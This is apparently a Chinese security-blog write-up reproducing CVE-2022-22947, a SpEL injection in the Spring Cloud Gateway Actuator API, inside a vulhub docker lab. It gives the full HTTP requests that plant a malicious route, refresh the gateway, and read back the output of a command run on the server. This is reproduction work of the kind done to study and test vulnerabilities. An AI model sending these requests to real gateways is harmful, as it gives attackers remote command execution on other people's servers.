!
也想出现在这里? 联系我们
创意广告

Spring_Cloud_Gateway_Actuator_API_SpEL表达式注入命令执行(CVE-2022-22947)

虽然现在发有点像炒冷饭?不过前几天太忙了 没时间看 既然复现了就记录一下吧

一、环境搭建

https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947
docker-compose up -d

image-20220304103612832

image-20220304103622903

二、漏洞复现

添加一个含有恶意SpEL表达式的路由

image-20220304103642365

POST /actuator/gateway/routes/UzJu HTTP/1.1
Host:  ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 324

{
  "id": "UzJu",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
  }],
"uri": "http://example.com",
"order": 0
}

image-20220304103706496

如果遇到提示Unsupported Media Type

image-20220304103723431

需要加上Content-Type为application/json即可

Content-Type: application/json

刷新网关触发SpEL表达式

POST /actuator/gateway/refresh HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 0

image-20220304103757058

随后发送如下请求

GET /actuator/gateway/routes/UzJu HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 0

image-20220304103818120

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞6 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容